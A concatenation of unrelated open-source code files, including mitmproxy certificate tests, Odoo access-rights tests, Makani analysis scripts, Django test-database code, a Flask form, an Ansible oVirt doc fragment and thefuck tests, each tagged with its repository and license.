# d.add("*", "foo")
# assert d.get("foo.com") == "foo"
# assert d.get("*.foo.com") == "foo"
# assert d.get("com") == "foo"
class TestCertStore:
def test_create_explicit(self):
with tutils.tmpdir() as d:
ca = certs.CertStore.from_store(d, "test")
assert ca.get_cert(b"foo", [])
ca2 = certs.CertStore.from_store(d, "test")
assert ca2.get_cert(b"foo", [])
assert ca.default_ca.get_serial_number() == ca2.default_ca.get_serial_number()
def test_create_no_common_name(self):
with tutils.tmpdir() as d:
ca = certs.CertStore.from_store(d, "test")
assert ca.get_cert(None, [])[0].cn is None
def test_create_tmp(self):
with tutils.tmpdir() as d:
ca = certs.CertStore.from_store(d, "test")
assert ca.get_cert(b"foo.com", [])
assert ca.get_cert(b"foo.com", [])
assert ca.get_cert(b"*.foo.com", [])
r = ca.get_cert(b"*.foo.com", [])
assert r[1] == ca.default_privatekey
def test_sans(self):
with tutils.tmpdir() as d:
ca = certs.CertStore.from_store(d, "test")
c1 = ca.get_cert(b"foo.com", [b"*.bar.com"])
ca.get_cert(b"foo.bar.com", [])
# assert c1 == c2
c3 = ca.get_cert(b"bar.com", [])
assert not c1 == c3
def test_sans_change(self):
with tutils.tmpdir() as d:
ca = certs.CertStore.from_store(d, "test")
ca.get_cert(b"foo.com", [b"*.bar.com"])
cert, key, chain_file = ca.get_cert(b"foo.bar.com", [b"*.baz.com"])
assert b"*.baz.com" in cert.altnames
def test_expire(self):
with tutils.tmpdir() as d:
ca = certs.CertStore.from_store(d, "test")
ca.STORE_CAP = 3
ca.get_cert(b"one.com", [])
ca.get_cert(b"two.com", [])
ca.get_cert(b"three.com", [])
assert (b"one.com", ()) in ca.certs
assert (b"two.com", ()) in ca.certs
assert (b"three.com", ()) in ca.certs
ca.get_cert(b"one.com", [])
assert (b"one.com", ()) in ca.certs
assert (b"two.com", ()) in ca.certs
assert (b"three.com", ()) in ca.certs
ca.get_cert(b"four.com", [])
assert (b"one.com", ()) not in ca.certs
assert (b"two.com", ()) in ca.certs
assert (b"three.com", ()) in ca.certs
assert (b"four.com", ()) in ca.certs
def test_overrides(self):
with tutils.tmpdir() as d:
ca1 = certs.CertStore.from_store(os.path.join(d, "ca1"), "test")
ca2 = certs.CertStore.from_store(os.path.join(d, "ca2"), "test")
assert not ca1.default_ca.get_serial_number(
) == ca2.default_ca.get_serial_number()
dc = ca2.get_cert(b"foo.com", [b"sans.example.com"])
dcp = os.path.join(d, "dc")
f = open(dcp, "wb")
f.write(dc[0].to_pem())
f.close()
ca1.add_cert_file(b"foo.com", dcp)
ret = ca1.get_cert(b"foo.com", [])
assert ret[0].serial == dc[0].serial
def test_create_dhparams(self):
with tutils.tmpdir() as d:
filename = os.path.join(d, "dhparam.pem")
certs.CertStore.load_dhparam(filename)
assert os.path.exists(filename)
class TestDummyCert:
def test_with_ca(self):
with tutils.tmpdir() as d:
ca = certs.CertStore.from_store(d, "test")
r = certs.dummy_cert(
ca.default_privatekey,
ca.default_ca,
b"foo.com",
[b"one.com", b"two.com", b"*.three.com", b"127.0.0.1"]
)
assert r.cn == b"foo.com"
assert r.altnames == [b'one.com', b'two.com', b'*.three.com']
r = certs.dummy_cert(
ca.default_privatekey,
ca.default_ca,
None,
[]
)
assert r.cn is None
assert r.altnames == []
class TestSSLCert:
def test_simple(self):
with open(tutils.test_data.path("mitmproxy/net/data/text_cert"), "rb") as f:
d = f.read()
c1 = certs.SSLCert.from_pem(d)
assert c1.cn == b"google.com"
assert len(c1.altnames) == 436
with open(tutils.test_data.path("mitmproxy/net/data/text_cert_2"), "rb") as f:
d = f.read()
c2 = certs.SSLCert.from_pem(d)
assert c2.cn == b"www.inode.co.nz"
assert len(c2.altnames) == 2
assert c2.digest("sha1")
assert c2.notbefore
assert c2.notafter
assert c2.subject
assert c2.keyinfo == ("RSA", 2048)
assert c2.serial
assert c2.issuer
assert c2.to_pem()
assert c2.has_expired is not None
assert not c1 == c2
assert c1 != c2
def test_err_broken_sans(self):
with open(tutils.test_data.path("mitmproxy/net/data/text_cert_weird1"), "rb") as f:
d = f.read()
c = certs.SSLCert.from_pem(d)
# This breaks unless we ignore a decoding error.
assert c.altnames is not None
def test_der(self):
with open(tutils.test_data.path("mitmproxy/net/data/dercert"), "rb") as f:
d = f.read()
s = certs.SSLCert.from_der(d)
assert s.cn
def test_state(self):
with open(tutils.test_data.path("mitmproxy/net/data/text_cert"), "rb") as f:
d = f.read()
c = certs.SSLCert.from_pem(d)
c.get_state()
c2 = c.copy()
a = c.get_state()
b = c2.get_state()
assert a == b
assert c == c2
assert c is not c2
x = certs.SSLCert('')
x.set_state(a)
assert x == c
| mit |
aifil/odoo | addons/project/tests/test_access_rights.py | 45 | 8940 | # -*- coding: utf-8 -*-
# Part of Odoo. See LICENSE file for full copyright and licensing details.
from openerp.addons.project.tests.test_project_base import TestProjectBase
from openerp.exceptions import AccessError
from openerp.exceptions import except_orm
from openerp.tools import mute_logger
class TestPortalProjectBase(TestProjectBase):
def setUp(self):
super(TestPortalProjectBase, self).setUp()
self.user_noone = self.env['res.users'].with_context({'no_reset_password': True, 'mail_create_nosubscribe': True}).create({
'name': 'Noemie NoOne',
'login': 'noemie',
'alias_name': 'noemie',
'email': '[email protected]',
'signature': '--\nNoemie',
'notify_email': 'always',
'groups_id': [(6, 0, [])]})
self.task_3 = self.env['project.task'].with_context({'mail_create_nolog': True}).create({
'name': 'Test3', 'user_id': self.user_portal.id, 'project_id': self.project_pigs.id})
self.task_4 = self.env['project.task'].with_context({'mail_create_nolog': True}).create({
'name': 'Test4', 'user_id': self.user_public.id, 'project_id': self.project_pigs.id})
self.task_5 = self.env['project.task'].with_context({'mail_create_nolog': True}).create({
'name': 'Test5', 'user_id': False, 'project_id': self.project_pigs.id})
self.task_6 = self.env['project.task'].with_context({'mail_create_nolog': True}).create({
'name': 'Test5', 'user_id': False, 'project_id': self.project_pigs.id})
class TestPortalProject(TestPortalProjectBase):
@mute_logger('openerp.addons.base.ir.ir_model')
def test_portal_project_access_rights(self):
pigs = self.project_pigs
pigs.write({'privacy_visibility': 'portal'})
# Do: Alfred reads project -> ok (employee ok public)
pigs.sudo(self.user_projectuser).read(['state'])
# Test: all project tasks visible
tasks = self.env['project.task'].sudo(self.user_projectuser).search([('project_id', '=', pigs.id)])
self.assertEqual(tasks, self.task_1 | self.task_2 | self.task_3 | self.task_4 | self.task_5 | self.task_6,
'access rights: project user should see all tasks of a portal project')
# Do: Bert reads project -> crash, no group
self.assertRaises(AccessError, pigs.sudo(self.user_noone).read, ['state'])
# Test: no project task searchable
self.assertRaises(AccessError, self.env['project.task'].sudo(self.user_noone).search, [('project_id', '=', pigs.id)])
# Data: task follower
pigs.sudo(self.user_projectmanager).message_subscribe_users(user_ids=[self.user_portal.id])
self.task_1.sudo(self.user_projectuser).message_subscribe_users(user_ids=[self.user_portal.id])
self.task_3.sudo(self.user_projectuser).message_subscribe_users(user_ids=[self.user_portal.id])
# Do: Chell reads project -> ok (portal ok public)
pigs.sudo(self.user_portal).read(['state'])
# Do: Donovan reads project -> ko (public ko portal)
# TODO: Change the except_orm to Warning ( Because here it's call check_access_rule
# which still generate exception in except_orm.)
self.assertRaises(except_orm, pigs.sudo(self.user_public).read, ['state'])
# Test: no access right to project.task
self.assertRaises(AccessError, self.env['project.task'].sudo(self.user_public).search, [])
# Data: task follower cleaning
self.task_1.sudo(self.user_projectuser).message_unsubscribe_users(user_ids=[self.user_portal.id])
self.task_3.sudo(self.user_projectuser).message_unsubscribe_users(user_ids=[self.user_portal.id])
@mute_logger('openerp.addons.base.ir.ir_model')
def test_employee_project_access_rights(self):
pigs = self.project_pigs
pigs.write({'privacy_visibility': 'employees'})
# Do: Alfred reads project -> ok (employee ok employee)
pigs.sudo(self.user_projectuser).read(['state'])
# Test: all project tasks visible
tasks = self.env['project.task'].sudo(self.user_projectuser).search([('project_id', '=', pigs.id)])
test_task_ids = set([self.task_1.id, self.task_2.id, self.task_3.id, self.task_4.id, self.task_5.id, self.task_6.id])
self.assertEqual(set(tasks.ids), test_task_ids,
'access rights: project user cannot see all tasks of an employees project')
# Do: Bert reads project -> crash, no group
self.assertRaises(AccessError, pigs.sudo(self.user_noone).read, ['state'])
# Do: Chell reads project -> ko (portal ko employee)
# TODO Change the except_orm to Warning
self.assertRaises(except_orm, pigs.sudo(self.user_portal).read, ['state'])
# Test: no project task visible + assigned
tasks = self.env['project.task'].sudo(self.user_portal).search([('project_id', '=', pigs.id)])
self.assertFalse(tasks.ids, 'access rights: portal user should not see tasks of an employees project, even if assigned')
# Do: Donovan reads project -> ko (public ko employee)
# TODO Change the except_orm to Warning
self.assertRaises(except_orm, pigs.sudo(self.user_public).read, ['state'])
# Do: project user is employee and can create a task
tmp_task = self.env['project.task'].sudo(self.user_projectuser).with_context({'mail_create_nolog': True}).create({
'name': 'Pigs task',
'project_id': pigs.id})
tmp_task.sudo(self.user_projectuser).unlink()
@mute_logger('openerp.addons.base.ir.ir_model')
def test_followers_project_access_rights(self):
pigs = self.project_pigs
pigs.write({'privacy_visibility': 'followers'})
# Do: Alfred reads project -> ko (employee ko followers)
# TODO Change the except_orm to Warning
self.assertRaises(AccessError, pigs.sudo(self.user_projectuser).read, ['state'])
# Test: no project task visible
tasks = self.env['project.task'].sudo(self.user_projectuser).search([('project_id', '=', pigs.id)])
self.assertEqual(tasks, self.task_1,
'access rights: employee user should not see tasks of a not-followed followers project, only assigned')
# Do: Bert reads project -> crash, no group
self.assertRaises(AccessError, pigs.sudo(self.user_noone).read, ['state'])
# Do: Chell reads project -> ko (portal ko employee)
self.assertRaises(except_orm, pigs.sudo(self.user_portal).read, ['state'])
# Test: no project task visible
tasks = self.env['project.task'].sudo(self.user_portal).search([('project_id', '=', pigs.id)])
self.assertEqual(tasks, self.task_3,
'access rights: portal user should not see tasks of a not-followed followers project, only assigned')
# Do: Donovan reads project -> ko (public ko employee)
# TODO Change the except_orm to Warning
self.assertRaises(except_orm, pigs.sudo(self.user_public).read, ['state'])
# Data: subscribe Alfred, Chell and Donovan as follower
pigs.message_subscribe_users(user_ids=[self.user_projectuser.id, self.user_portal.id, self.user_public.id])
self.task_1.sudo(self.user_projectmanager).message_subscribe_users(user_ids=[self.user_portal.id, self.user_projectuser.id])
self.task_3.sudo(self.user_projectmanager).message_subscribe_users(user_ids=[self.user_portal.id, self.user_projectuser.id])
# Do: Alfred reads project -> ok (follower ok followers)
prout = pigs.sudo(self.user_projectuser)
prout.invalidate_cache()
prout.read(['state'])
# Do: Chell reads project -> ok (follower ok follower)
pigs.sudo(self.user_portal).read(['state'])
# Do: Donovan reads project -> ko (public ko follower even if follower)
# TODO Change the except_orm to Warning
self.assertRaises(except_orm, pigs.sudo(self.user_public).read, ['state'])
# Do: project user is follower of the project and can create a task
self.env['project.task'].sudo(self.user_projectuser.id).with_context({'mail_create_nolog': True}).create({
'name': 'Pigs task', 'project_id': pigs.id
})
# not follower user should not be able to create a task
pigs.sudo(self.user_projectuser).message_unsubscribe_users(user_ids=[self.user_projectuser.id])
self.assertRaises(except_orm, self.env['project.task'].sudo(self.user_projectuser).with_context({
'mail_create_nolog': True}).create, {'name': 'Pigs task', 'project_id': pigs.id})
# Do: project user can create a task without project
self.assertRaises(except_orm, self.env['project.task'].sudo(self.user_projectuser).with_context({
'mail_create_nolog': True}).create, {'name': 'Pigs task', 'project_id': pigs.id})
| gpl-3.0 |
google/makani | analysis/checks/autocheck.py | 1 | 5507 | # Copyright 2020 Makani Technologies LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Functions to perform log autochecking."""
from makani.analysis.checks import base_check
from makani.analysis.checks import gradebook
from makani.analysis.checks import gradebook_base_check
from makani.analysis.checks import iter_files
from makani.lib.python import lru_cache
from makani.lib.python import struct_tree
def AutoCheck(log_file, check_list):
"""Run checks for a log file.
Args:
log_file: The log file to check.
check_list: A CheckList object with criteria to check.
Returns:
A dictionary of checked results. Example:
results[<message_type>][<aio_node>][<top_attribute>][<sub_field>] = {
'total': 1000,
'warnings': {
'count': 123,
'range': [48.8, 55.6],
},
'errors': {
'count': 123,
'range': [78.8, 91.6],
},
}
"""
data = struct_tree.StructTree(log_file, True)
cache = lru_cache.LruCache(50)
for check_item in check_list.List():
# Check every element.
args = check_item.Populate(data, cache)
check_item.Check(*args)
def _GetFullListOfChecks(check_list, gradebook_file):
"""Merge the regular checklist with the one defined as a gradebook."""
full_check_list = base_check.ListOfChecks()
if gradebook_file:
book = gradebook.Gradebook(gradebook_file)
gradebook_list = gradebook_base_check.GradebookChecks()
gradebook_list.Initialize(book, for_log=True, use_full_name=True)
full_check_list.Concatenate(gradebook_list)
if check_list:
full_check_list.Concatenate(check_list)
return full_check_list
def RunFromLocal(log_dir, prefix, check_list, gradebook_file, verbose):
"""Autocheck logs in a local directory."""
full_check_list = _GetFullListOfChecks(check_list, gradebook_file)
results_by_file = {}
for filename in iter_files.IterFromLocal(log_dir, prefix):
if verbose:
print 'Processing %s .......................' % filename
AutoCheck(filename, full_check_list)
if verbose:
print full_check_list.TextSummary()
results_by_file[filename] = full_check_list.MergeResults()
return results_by_file
def RunFromCloud(cloud_path, prefix, check_list, gradebook_file, verbose):
"""Autocheck logs in a cloud directory."""
results_by_file = {}
full_check_list = _GetFullListOfChecks(check_list, gradebook_file)
for filename, temp_name in iter_files.IterFilesFromCloud(cloud_path, prefix):
if verbose:
print 'Processing %s ..............................' % filename
AutoCheck(temp_name, full_check_list)
if verbose:
print full_check_list.TextSummary()
results_by_file[filename] = full_check_list.MergeResults()
return results_by_file
def MergeResultsFromMultipleFiles(results_by_file, info_levels):
"""Merge multiple results to show occurrences in files and range of values.
Args:
results_by_file: A dict of check results indexed by file name.
info_levels: A list of report levels to merge. E.g., ['warning', 'error']
Returns:
A dict of check results in the form of:
{`check_name`: {`file_name`: [lower_bound, upper_bound]}}
"""
merged = {}
for filename, results in results_by_file.iteritems():
if results:
for check_name, values in results.iteritems():
bounds = [float('inf'), -float('inf')]
tracebacks = set()
# Example `values`:
# {'warning', {'count': 100, 'range': [0, 1]}}
is_set = False
for field, details in values.iteritems():
if field in info_levels:
if 'range' in details:
bounds[0] = min(bounds[0], details['range'][0])
bounds[1] = max(bounds[1], details['range'][1])
is_set = True
if 'traceback' in details:
tracebacks.add(details['traceback'])
report = {}
if is_set:
report['range'] = bounds
if tracebacks:
report['traceback'] = list(tracebacks)
if report:
if check_name not in merged:
merged[check_name] = {}
merged[check_name][filename] = report
return merged
def GatherResultsFromMultipleFiles(results_by_file):
"""Gather multiple results to organize them by check name and file name.
Args:
results_by_file: A dict of check results indexed by file name.
Returns:
A dict of check results in the form of:
{`check_name`: {`file_name`: {
'warning': {
'range': [lower_bound, upper_bound]
'count': number of occurrences that fall into the range,
'total': total number of data points,
},
'error': ...
}}}
"""
merged = {}
for filename, results in results_by_file.iteritems():
if results:
for check_name, values in results.iteritems():
if check_name not in merged:
merged[check_name] = {filename: values}
else:
merged[check_name][filename] = values
return merged
| apache-2.0 |
google/makani | avionics/network/network_routes.py | 1 | 3560 | #!/usr/bin/python
# Copyright 2020 Makani Technologies LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Set of various AIO network tools."""
# TODO: Rename this file to something more accurate.
import re
import sys
import gflags
from makani.avionics.network import network_config
from makani.avionics.network import network_util
gflags.DEFINE_bool('print_routes', False,
'Indicates whether to print multicast routes.')
gflags.DEFINE_string('network_file', None,
'Full path to the yaml file that describes the network.')
gflags.MarkFlagAsRequired('network_file')
gflags.DEFINE_bool('write_dot_files', False,
'Indicates whether to write a dot network description file.')
FLAGS = gflags.FLAGS
def _PrintMulticastRoutes(forwarding_maps):
"""Prints the multicast routing tables for each switch."""
print ''
print 'Multicast Routes'
print '================'
for switch, forwarding_map in sorted(forwarding_maps.iteritems()):
print ' %s multicast routes:' % switch
for message_type, out_ports in sorted(forwarding_map.iteritems()):
print ' [%s] = 0x%X' % (message_type, out_ports)
def _WriteDotFiles(path_finder):
"""Writes a pair of dot files showing the network topology.
full.dot is the full network, with each port listed as a separate node.
reduced.dot is a simplified view with a node for each switch or aio_node.
Args:
path_finder: A network_util.PathFinder over the network.
"""
links = path_finder.GetAllConnections()
with open('full.dot', 'w') as f:
f.write('graph network {\n')
for link in links:
source = link[0].replace('.', '_')
dest = link[1].replace('.', '_')
f.write(' %s -- %s;\n' % (source, dest))
f.write('}\n')
print 'Wrote full.dot.'
with open('reduced.dot', 'w') as f:
f.write('graph network {\n')
for link in links:
re0 = r'switches.([a-z_0-9]+).[0-9]+'
re1 = r'aio_nodes\.([a-z_0-9]+)'
source = re.sub(re0, r'switch_\1', link[0])
source = re.sub(re1, r'\1', source)
dest = re.sub(re0, r'switch_\1', link[1])
dest = re.sub(re1, r'\1', dest)
if source != dest:
f.write(' %s -- %s;\n' % (source, dest))
f.write('}\n')
print 'Wrote reduced.dot.'
print('Now try e.g. \'fdp ./reduced.dot -Tpng:gd > reduced.png && '
'eog reduced.png\'')
def main(argv):
try:
argv = FLAGS(argv)
except gflags.FlagsError, e:
sys.stderr.write('\nError: %s\n\nUsage: %s ARGS\n%s\n'
% (e, argv[0], FLAGS))
sys.exit(1)
config = network_config.NetworkConfig(FLAGS.network_file)
message_types = config.all_messages
path_finder = network_util.PathFinder(config.GetSwitches(), message_types)
if FLAGS.print_routes:
forwarding_maps = network_util.MakeForwardingMaps(
message_types, path_finder)
if FLAGS.print_routes:
_PrintMulticastRoutes(forwarding_maps)
if FLAGS.write_dot_files:
_WriteDotFiles(path_finder)
if __name__ == '__main__':
main(sys.argv)
| apache-2.0 |
kisna72/django | django/db/backends/base/creation.py | 147 | 10102 | import sys
import time
from django.apps import apps
from django.conf import settings
from django.core import serializers
from django.db import router
from django.utils.six import StringIO
from django.utils.six.moves import input
# The prefix to put on the default database name when creating
# the test database.
TEST_DATABASE_PREFIX = 'test_'
class BaseDatabaseCreation(object):
"""
This class encapsulates all backend-specific differences that pertain to
creation and destruction of the test database.
"""
def __init__(self, connection):
self.connection = connection
@property
def _nodb_connection(self):
"""
Used to be defined here, now moved to DatabaseWrapper.
"""
return self.connection._nodb_connection
def create_test_db(self, verbosity=1, autoclobber=False, serialize=True, keepdb=False):
"""
Creates a test database, prompting the user for confirmation if the
database already exists. Returns the name of the test database created.
"""
# Don't import django.core.management if it isn't needed.
from django.core.management import call_command
test_database_name = self._get_test_db_name()
if verbosity >= 1:
test_db_repr = ''
action = 'Creating'
if verbosity >= 2:
test_db_repr = " ('%s')" % test_database_name
if keepdb:
action = "Using existing"
print("%s test database for alias '%s'%s..." % (
action, self.connection.alias, test_db_repr))
# We could skip this call if keepdb is True, but we instead
# give it the keepdb param. This is to handle the case
# where the test DB doesn't exist, in which case we need to
# create it, then just not destroy it. If we instead skip
# this, we will get an exception.
self._create_test_db(verbosity, autoclobber, keepdb)
self.connection.close()
settings.DATABASES[self.connection.alias]["NAME"] = test_database_name
self.connection.settings_dict["NAME"] = test_database_name
# We report migrate messages at one level lower than that requested.
# This ensures we don't get flooded with messages during testing
# (unless you really ask to be flooded).
call_command(
'migrate',
verbosity=max(verbosity - 1, 0),
interactive=False,
database=self.connection.alias,
run_syncdb=True,
)
# We then serialize the current state of the database into a string
# and store it on the connection. This slightly horrific process is so people
# who are testing on databases without transactions or who are using
# a TransactionTestCase still get a clean database on every test run.
if serialize:
self.connection._test_serialized_contents = self.serialize_db_to_string()
call_command('createcachetable', database=self.connection.alias)
# Ensure a connection for the side effect of initializing the test database.
self.connection.ensure_connection()
return test_database_name
def set_as_test_mirror(self, primary_settings_dict):
"""
Set this database up to be used in testing as a mirror of a primary database
whose settings are given
"""
self.connection.settings_dict['NAME'] = primary_settings_dict['NAME']
def serialize_db_to_string(self):
"""
Serializes all data in the database into a JSON string.
Designed only for test runner usage; will not handle large
amounts of data.
"""
# Build list of all apps to serialize
from django.db.migrations.loader import MigrationLoader
loader = MigrationLoader(self.connection)
app_list = []
for app_config in apps.get_app_configs():
if (
app_config.models_module is not None and
app_config.label in loader.migrated_apps and
app_config.name not in settings.TEST_NON_SERIALIZED_APPS
):
app_list.append((app_config, None))
# Make a function to iteratively return every object
def get_objects():
for model in serializers.sort_dependencies(app_list):
if (model._meta.can_migrate(self.connection) and
router.allow_migrate_model(self.connection.alias, model)):
queryset = model._default_manager.using(self.connection.alias).order_by(model._meta.pk.name)
for obj in queryset.iterator():
yield obj
# Serialize to a string
out = StringIO()
serializers.serialize("json", get_objects(), indent=None, stream=out)
return out.getvalue()
def deserialize_db_from_string(self, data):
"""
Reloads the database with data from a string generated by
the serialize_db_to_string method.
"""
data = StringIO(data)
for obj in serializers.deserialize("json", data, using=self.connection.alias):
obj.save()
def _get_test_db_name(self):
"""
Internal implementation - returns the name of the test DB that will be
created. Only useful when called from create_test_db() and
_create_test_db() and when no external munging is done with the 'NAME'
or 'TEST_NAME' settings.
"""
if self.connection.settings_dict['TEST']['NAME']:
return self.connection.settings_dict['TEST']['NAME']
return TEST_DATABASE_PREFIX + self.connection.settings_dict['NAME']
def _create_test_db(self, verbosity, autoclobber, keepdb=False):
"""
Internal implementation - creates the test db tables.
"""
suffix = self.sql_table_creation_suffix()
test_database_name = self._get_test_db_name()
qn = self.connection.ops.quote_name
# Create the test database and connect to it.
with self._nodb_connection.cursor() as cursor:
try:
cursor.execute(
"CREATE DATABASE %s %s" % (qn(test_database_name), suffix))
except Exception as e:
# if we want to keep the db, then no need to do any of the below,
# just return and skip it all.
if keepdb:
return test_database_name
sys.stderr.write(
"Got an error creating the test database: %s\n" % e)
if not autoclobber:
confirm = input(
"Type 'yes' if you would like to try deleting the test "
"database '%s', or 'no' to cancel: " % test_database_name)
if autoclobber or confirm == 'yes':
try:
if verbosity >= 1:
print("Destroying old test database '%s'..."
% self.connection.alias)
cursor.execute(
"DROP DATABASE %s" % qn(test_database_name))
cursor.execute(
"CREATE DATABASE %s %s" % (qn(test_database_name),
suffix))
except Exception as e:
sys.stderr.write(
"Got an error recreating the test database: %s\n" % e)
sys.exit(2)
else:
print("Tests cancelled.")
sys.exit(1)
return test_database_name
def destroy_test_db(self, old_database_name, verbosity=1, keepdb=False):
"""
Destroy a test database, prompting the user for confirmation if the
database already exists.
"""
self.connection.close()
test_database_name = self.connection.settings_dict['NAME']
if verbosity >= 1:
test_db_repr = ''
action = 'Destroying'
if verbosity >= 2:
test_db_repr = " ('%s')" % test_database_name
if keepdb:
action = 'Preserving'
print("%s test database for alias '%s'%s..." % (
action, self.connection.alias, test_db_repr))
# if we want to preserve the database
# skip the actual destroying piece.
if not keepdb:
self._destroy_test_db(test_database_name, verbosity)
# Restore the original database name
settings.DATABASES[self.connection.alias]["NAME"] = old_database_name
self.connection.settings_dict["NAME"] = old_database_name
def _destroy_test_db(self, test_database_name, verbosity):
"""
Internal implementation - remove the test db tables.
"""
# Remove the test database to clean up after
# ourselves. Connect to the previous database (not the test database)
# to do so, because it's not allowed to delete a database while being
# connected to it.
with self.connection._nodb_connection.cursor() as cursor:
# Wait to avoid "database is being accessed by other users" errors.
time.sleep(1)
cursor.execute("DROP DATABASE %s"
% self.connection.ops.quote_name(test_database_name))
def sql_table_creation_suffix(self):
"""
SQL to append to the end of the test table creation statements.
"""
return ''
def test_db_signature(self):
"""
Returns a tuple with elements of self.connection.settings_dict (a
DATABASES setting value) that uniquely identify a database
accordingly to the RDBMS particularities.
"""
settings_dict = self.connection.settings_dict
return (
settings_dict['HOST'],
settings_dict['PORT'],
settings_dict['ENGINE'],
settings_dict['NAME']
)
| bsd-3-clause |
michaelrice/vBurgundy | vBurgundy/user/forms.py | 1 | 1679 | from flask_wtf import Form
from wtforms import PasswordField, StringField
from wtforms.validators import DataRequired, Email, EqualTo, Length
from .models import User
class RegisterForm(Form):
"""
Registration Form for new users.
"""
username = StringField('Username',
validators=[DataRequired(),
Length(min=3, max=25)])
email = StringField('Email',
validators=[DataRequired(),
Email(), Length(min=6, max=40)])
password = PasswordField('Password',
validators=[DataRequired(),
Length(min=6, max=40)])
confirm = PasswordField('Verify password',
[DataRequired(),
EqualTo('password',
message='Passwords must match')])
def __init__(self, *args, **kwargs):
super(RegisterForm, self).__init__(*args, **kwargs)
self.user = None
def validate(self):
"""
Validate if the user is a valid new user or not.
:return:
:rtype boolean:
"""
initial_validation = super(RegisterForm, self).validate()
if not initial_validation:
return False
user = User.query.filter_by(username=self.username.data).first()
if user:
self.username.errors.append("Username already registered")
return False
user = User.query.filter_by(email=self.email.data).first()
if user:
self.email.errors.append("Email already registered")
return False
return True | apache-2.0 |
caphrim007/ansible | lib/ansible/utils/module_docs_fragments/ovirt_facts.py | 33 | 3556 | # -*- coding: utf-8 -*-
#
# Copyright (c) 2016 Red Hat, Inc.
#
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
#
class ModuleDocFragment(object):
# facts standard oVirt documentation fragment
DOCUMENTATION = '''
options:
fetch_nested:
description:
- "If I(True) the module will fetch additional data from the API."
- "It will fetch IDs of the VMs disks, snapshots, etc. User can configure to fetch other
attributes of the nested entities by specifying C(nested_attributes)."
version_added: "2.3"
type: bool
nested_attributes:
description:
- "Specifies list of the attributes which should be fetched from the API."
- "This parameter apply only when C(fetch_nested) is I(true)."
version_added: "2.3"
auth:
required: True
description:
- "Dictionary with values needed to create HTTP/HTTPS connection to oVirt:"
- C(username)[I(required)] - The name of the user, something like I(admin@internal).
Default value is set by I(OVIRT_USERNAME) environment variable.
- "C(password)[I(required)] - The password of the user. Default value is set by I(OVIRT_PASSWORD) environment variable."
- "C(url)- A string containing the API URL of the server, usually
something like `I(https://server.example.com/ovirt-engine/api)`. Default value is set by I(OVIRT_URL) environment variable.
Either C(url) or C(hostname) is required."
- "C(hostname) - A string containing the hostname of the server, usually
something like `I(server.example.com)`. Default value is set by I(OVIRT_HOSTNAME) environment variable.
Either C(url) or C(hostname) is required."
- "C(token) - Token to be used instead of login with username/password. Default value is set by I(OVIRT_TOKEN) environment variable."
- "C(insecure) - A boolean flag that indicates if the server TLS
certificate and host name should be checked."
- "C(ca_file) - A PEM file containing the trusted CA certificates. The
certificate presented by the server will be verified using these CA
certificates. If `C(ca_file)` parameter is not set, system wide
CA certificate store is used. Default value is set by I(OVIRT_CAFILE) environment variable."
- "C(kerberos) - A boolean flag indicating if Kerberos authentication
should be used instead of the default basic authentication."
- "C(headers) - Dictionary of HTTP headers to be added to each API call."
requirements:
- python >= 2.7
- ovirt-engine-sdk-python >= 4.2.4
notes:
- "In order to use this module you have to install oVirt Python SDK.
To ensure it's installed with correct version you can create the following task:
pip: name=ovirt-engine-sdk-python version=4.2.4"
'''
| gpl-3.0 |
bugaevc/thefuck | tests/rules/test_dirty_untar.py | 5 | 1795 | import os
import pytest
import tarfile
from thefuck.rules.dirty_untar import match, get_new_command, side_effect
from tests.utils import Command
@pytest.fixture
def tar_error(tmpdir):
def fixture(filename):
path = os.path.join(str(tmpdir), filename)
def reset(path):
with tarfile.TarFile(path, 'w') as archive:
for file in ('a', 'b', 'c'):
with open(file, 'w') as f:
f.write('*')
archive.add(file)
os.remove(file)
with tarfile.TarFile(path, 'r') as archive:
archive.extractall()
os.chdir(str(tmpdir))
reset(path)
assert(set(os.listdir('.')) == {filename, 'a', 'b', 'c'})
return fixture
parametrize_filename = pytest.mark.parametrize('filename', [
'foo.tar',
'foo.tar.gz',
'foo.tgz'])
parametrize_script = pytest.mark.parametrize('script, fixed', [
('tar xvf {}', 'mkdir -p foo && tar xvf {} -C foo'),
('tar -xvf {}', 'mkdir -p foo && tar -xvf {} -C foo'),
('tar --extract -f {}', 'mkdir -p foo && tar --extract -f {} -C foo')])
@parametrize_filename
@parametrize_script
def test_match(tar_error, filename, script, fixed):
tar_error(filename)
assert match(Command(script=script.format(filename)), None)
@parametrize_filename
@parametrize_script
def test_side_effect(tar_error, filename, script, fixed):
tar_error(filename)
side_effect(Command(script=script.format(filename)), None)
assert(os.listdir('.') == [filename])
@parametrize_filename
@parametrize_script
def test_get_new_command(tar_error, filename, script, fixed):
tar_error(filename)
assert get_new_command(Command(script=script.format(filename)), None) == fixed.format(filename)
| mit |
gritlogic/incubator-airflow | setup.py | 1 | 9028 | # -*- coding: utf-8 -*-
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from setuptools import setup, find_packages, Command
from setuptools.command.test import test as TestCommand
import imp
import logging
import os
import sys
